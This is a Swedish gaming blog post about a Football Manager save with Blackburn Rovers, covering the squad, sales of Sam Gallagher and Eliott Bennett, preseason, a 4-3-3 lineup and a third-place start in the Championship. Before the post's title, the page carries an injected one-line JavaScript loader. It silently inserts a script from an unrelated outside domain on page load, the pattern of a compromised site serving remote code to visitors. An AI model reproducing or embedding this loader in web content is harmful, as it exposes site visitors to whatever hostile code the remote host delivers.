;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Blackburn Rovers – Premiär! – FMSweden
Meny Stäng

Blackburn Rovers – Premiär!

Dagens inlägg blir rätt matigt och vi sätter lite tempo i den här rapporten. Truppen, försäsongen, värvningar men också en koll på hur starten på Championship har sett ut.

Truppen: En hyfsat jämn trupp där jag tycker det finns stor kvalité i alla lagdelar även om det är tydligt att spetsen ligger i anfallsdelen av truppen vilket jag tror kommer passa vår filosofi och taktik väl. Bradley Dack, Adam Armstrong och Harvey Elliott kommer få stort förtroende. Mittfältet står för stor rutin. Backlinjen är något svårplacerad och svårbedömd med många spelare som kan spela både mittback och ytterback. Längre ner i inlägget ser ni hur vi ställer upp vårt lag men som trupp tycker jag den ser bra ut med tydlig spets men också den bredd som krävs när det ska spelas 46 matcher.

Silly Season: En ganska lugn Silly Season delvis på grund av en snål budget men också på grund av en bra grund att stå på när det kommer till spelarmaterial. Med en övergångsbudget på 1.15 miljoner kronor fanns det inte så mycket att göra. Vi kikade lite på bosman alternativ men hittade inget intressant som skulle kunna stärka vår trupp och då är det bättre att låta bli. Fokus har i stället varit på att förnya kontrakt samt sälja och låna ut. Sam Gallagher blev vår största försäljning och det var inte en spelare jag från början hade för avsikt att sälja men när han inte ville vara kvar efter ett bud från Brentford som jag avslog fanns det ingen anledning att behålla honom.

IN: –

UT:

  • Eliott Bennett 2,5 mn kr (Colorado Rapids)
  • Sam Gallagher 28 mn kr (Reading)

Försäsongen: En stabil genomförd försäsong där vi körde tufft och tungt ute på träningsanläggningen men trots tunga träningsdagar så lyckas vi få med oss bra resultat. Vi ställs inte mot några toppgäng överhuvudtaget men viktigast var att få en go känsla i spelargruppen och det har denna försäsong bidragit med. Även vidare i cupen.

Startelvan: Hur formerar vi laget då? 4-3-2-1 som jag vill benämna den rent siffermässigt på papper. Man kan också kalla det en 4-3-3. Bradley Johnson får en viktig roll som block framför mittfältet. Som tidigare nämnt tror jag mycket på Dack, Armstrong och Elliott framåt. Branthwaithe som är inlånad från Everton kommer få stort förtroende där Ayalas snabbhet gör att han kommer förpassas till bänken till att börja med. Med vår höga press är snabbheten en egenskap jag tagit noga i beräkning när jag valt min backlinje. Det finns bra alternativ på bänken och 46 matcher plus cupmatcher ska spelas så antagligen kommer elvan se väldigt annorlunda ut under säsongens gång men i premiären ser laget ut på följande sätt:

Starten på säsongen: Det har varit en produktiv start på säsongen där vi nått en hel del bra resultat där Bradley Dack hittat rätt i sin roll som forward direkt. Resultaten efter första sju matcherna räcker till en tredjeplats i tabellen men hur tabellen ser ut efter sju matcher är mindre intressant. Hur spelet ser ut är viktigare och där är jag mycket nöjd eftersom vi inte haft så mycket tid att spela ihop vår taktik och redan nu visar vilka resultat vi kan nå.

Superkul att vara igång med Blackburn och det hoppas jag att ni som läsare också tycker. Häng med på resan och tveka inte på att komma med tips, tankar och funderingar. Mot PL!

Please wait...

Liknande Inlägg

6 kommentarer

Lämna ett svar